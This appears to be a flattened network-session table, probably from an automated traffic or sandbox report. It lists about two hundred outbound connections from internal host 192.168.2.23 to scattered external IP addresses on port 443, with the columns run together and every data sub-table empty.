                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12602192.168.2.2352800196.107.6.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12603192.168.2.234003843.8.70.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12604192.168.2.235371839.55.186.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12605192.168.2.2353688153.6.200.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12606192.168.2.2350396119.65.146.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12607192.168.2.233878251.95.199.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12608192.168.2.2336756132.247.22.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12609192.168.2.2355800156.52.128.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12610192.168.2.2357636107.135.172.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12611192.168.2.2335942190.144.232.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12612192.168.2.2349242145.10.11.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12613192.168.2.2333382147.19.215.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12614192.168.2.233639071.156.220.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12615192.168.2.2333296105.226.104.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12616192.168.2.2340780186.197.10.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12617192.168.2.2340284125.52.53.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12618192.168.2.235292631.64.53.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12619192.168.2.234681858.88.161.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12620192.168.2.2346426172.224.44.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12621192.168.2.233904442.23.169.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12622192.168.2.234210220.59.184.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12623192.168.2.2347726190.116.73.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12624192.168.2.235288843.98.124.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12625192.168.2.234618283.111.69.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12626192.168.2.234766073.33.205.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12627192.168.2.2335402134.144.252.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12628192.168.2.2343166139.222.97.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12629192.168.2.2351498166.140.232.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12630192.168.2.2347310119.40.105.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12631192.168.2.2359706133.59.40.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12632192.168.2.235138262.46.160.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12633192.168.2.235906688.110.196.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12634192.168.2.2336212125.196.52.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12635192.168.2.2350672178.39.200.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12636192.168.2.234222899.72.102.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12637192.168.2.2345810183.161.153.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12638192.168.2.2356524188.22.209.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12639192.168.2.235191031.77.250.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12640192.168.2.234915240.202.30.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12641192.168.2.2337240223.203.63.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12642192.168.2.2347472181.61.217.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12643192.168.2.2358836109.71.58.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12644192.168.2.236093051.216.20.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12645192.168.2.235701290.144.104.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12646192.168.2.233937012.81.172.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12647192.168.2.2353182191.171.96.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12648192.168.2.2336568101.247.144.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12649192.168.2.2359132159.208.73.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12650192.168.2.2360168124.154.241.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12651192.168.2.233893496.141.222.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12652192.168.2.2348724198.199.25.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12653192.168.2.235531873.117.137.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12654192.168.2.236051686.40.249.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12655192.168.2.235830270.128.50.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12656192.168.2.2352256175.165.59.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12657192.168.2.233849244.205.168.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12658192.168.2.2360506123.173.188.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12659192.168.2.2346872161.25.219.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12660192.168.2.234531483.201.206.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12661192.168.2.235457670.118.216.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12662192.168.2.23338528.2.228.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12663192.168.2.2353476174.75.3.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12664192.168.2.235069240.129.249.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12665192.168.2.2346642131.50.214.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12666192.168.2.23588625.232.183.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12667192.168.2.234306638.9.177.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12668192.168.2.2336718207.42.31.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12669192.168.2.2357124122.217.203.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12670192.168.2.2355524158.36.70.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12671192.168.2.2339440208.10.72.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12672192.168.2.233778425.68.116.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12673192.168.2.233411298.180.131.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12674192.168.2.234854027.198.198.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12675192.168.2.2351742178.159.57.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12676192.168.2.2337640188.29.87.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12677192.168.2.2332828197.110.199.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12678192.168.2.2348506111.246.131.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12679192.168.2.2358152136.194.122.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12680192.168.2.2351930217.215.84.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12681192.168.2.2343906196.117.29.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12682192.168.2.234350070.157.100.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12683192.168.2.2355320140.33.167.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12684192.168.2.2341174144.254.251.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12685192.168.2.23346228.118.204.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12686192.168.2.2352022162.192.236.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12687192.168.2.234494458.237.80.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12688192.168.2.2339420169.177.203.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12689192.168.2.2344274182.132.163.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12690192.168.2.2358308123.175.202.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12691192.168.2.2339396173.174.72.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12692192.168.2.2346804193.131.40.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12693192.168.2.2356264112.107.61.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12694192.168.2.2358352101.13.253.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12695192.168.2.2346134149.164.192.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12696192.168.2.2357418142.232.142.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12697192.168.2.2341458147.129.159.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12698192.168.2.234748268.184.201.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12699192.168.2.2353228119.67.240.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12700192.168.2.2358694144.69.189.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12701192.168.2.2350248219.29.154.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12702192.168.2.236091077.246.152.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12703192.168.2.234962670.113.57.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12704192.168.2.2354740109.247.106.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12705192.168.2.2347478105.152.56.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12706192.168.2.2332954157.247.117.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12707192.168.2.2338384223.122.246.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12708192.168.2.2335646187.40.145.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12709192.168.2.233423485.0.176.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12710192.168.2.234886297.62.200.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12711192.168.2.2335256140.182.135.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12712192.168.2.2333174192.76.103.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12713192.168.2.2337820153.7.153.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12714192.168.2.234191043.250.176.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12715192.168.2.2350152190.134.100.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12716192.168.2.234727627.42.51.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12717192.168.2.2341590122.89.234.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12718192.168.2.2343306164.26.26.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12719192.168.2.233557490.212.185.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12720192.168.2.233498094.59.190.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12721192.168.2.235763086.158.27.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12722192.168.2.233523813.182.167.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12723192.168.2.2360844209.128.161.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12724192.168.2.2348100160.255.136.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12725192.168.2.2353676204.21.243.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12726192.168.2.2355784166.108.204.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12727192.168.2.2349514212.109.54.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12728192.168.2.2344628135.192.160.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12729192.168.2.235275673.213.107.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12730192.168.2.2336450135.236.152.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12731192.168.2.234651645.149.59.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12732192.168.2.235736438.191.97.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12733192.168.2.235356813.216.77.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12734192.168.2.2335292183.57.246.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12735192.168.2.234360031.39.29.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12736192.168.2.2354546222.86.5.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12737192.168.2.2348736139.241.137.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12738192.168.2.2341476176.39.187.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12739192.168.2.2335696216.218.172.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12740192.168.2.2350366191.22.168.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12741192.168.2.2340364167.75.146.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12742192.168.2.2342516223.74.135.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12743192.168.2.2335782208.76.160.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12744192.168.2.2355448167.133.183.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12745192.168.2.233928488.153.77.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12746192.168.2.235085454.28.243.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12747192.168.2.2340822209.52.129.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12748192.168.2.235612479.220.93.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12749192.168.2.2360124129.176.36.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12750192.168.2.234700214.67.103.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12751192.168.2.235523690.215.226.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12752192.168.2.2344788131.209.190.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12753192.168.2.234995039.19.197.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12754192.168.2.2337044184.134.203.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12755192.168.2.233936041.143.106.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12756192.168.2.234567298.103.79.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12757192.168.2.2334316148.146.161.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12758192.168.2.2354986146.235.126.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12759192.168.2.2344968223.209.7.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12760192.168.2.2347596218.155.10.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12761192.168.2.234121625.180.46.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12762192.168.2.233533431.131.190.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12763192.168.2.2340716141.236.148.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12764192.168.2.233393052.36.49.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12765192.168.2.2354698161.62.58.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12766192.168.2.235390444.144.231.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12767192.168.2.2341676179.12.85.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12768192.168.2.235970496.198.41.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12769192.168.2.2335768217.249.12.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12770192.168.2.2343096213.182.236.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12771192.168.2.235200018.2.122.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12772192.168.2.2339018124.248.37.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12773192.168.2.2349698211.102.222.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12774192.168.2.2335976107.134.97.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12775192.168.2.233447853.35.46.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12776192.168.2.2348540122.195.43.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12777192.168.2.234158019.42.185.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12778192.168.2.233936812.64.178.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12779192.168.2.2333758200.196.111.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12780192.168.2.233414463.126.34.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12781192.168.2.235635613.150.171.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12782192.168.2.233599058.85.164.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12783192.168.2.234990634.29.187.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12784192.168.2.235517887.242.122.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12785192.168.2.2339030206.105.132.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12786192.168.2.233314014.138.55.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12787192.168.2.235779445.5.191.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12788192.168.2.2358982209.91.124.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12789192.168.2.23560304.188.9.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12790192.168.2.234932453.65.19.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12791192.168.2.234057489.145.237.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12792192.168.2.2354462162.143.79.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12793192.168.2.233338878.24.251.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12794192.168.2.2339374120.114.236.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12795192.168.2.2349800178.186.170.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12796192.168.2.2357786107.108.186.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12797192.168.2.234554035.109.133.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12798192.168.2.2348568109.118.217.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12799192.168.2.2344186106.104.116.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12800192.168.2.2343578179.98.194.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12801192.168.2.235808468.48.64.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12802192.168.2.234456825.142.23.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12803192.168.2.2356892201.238.147.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12804192.168.2.235536864.50.37.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12805192.168.2.2349508151.216.90.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12806192.168.2.233593085.4.109.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12807192.168.2.234041877.125.227.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12808192.168.2.2355836205.40.0.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12809192.168.2.2337038117.106.173.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12810192.168.2.2359972148.187.232.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12811192.168.2.234311296.94.199.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12812192.168.2.2342204107.133.138.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12813192.168.2.2345740177.88.127.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12814192.168.2.233678244.16.117.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12815192.168.2.234003853.152.223.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12816192.168.2.2359632212.46.137.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12817192.168.2.235909243.59.124.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12818192.168.2.2359548201.219.93.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12819192.168.2.2355544221.169.185.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12820192.168.2.2343266170.180.91.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12821192.168.2.2356534157.147.239.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12822192.168.2.2355214216.12.187.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12823192.168.2.234512241.121.212.44443
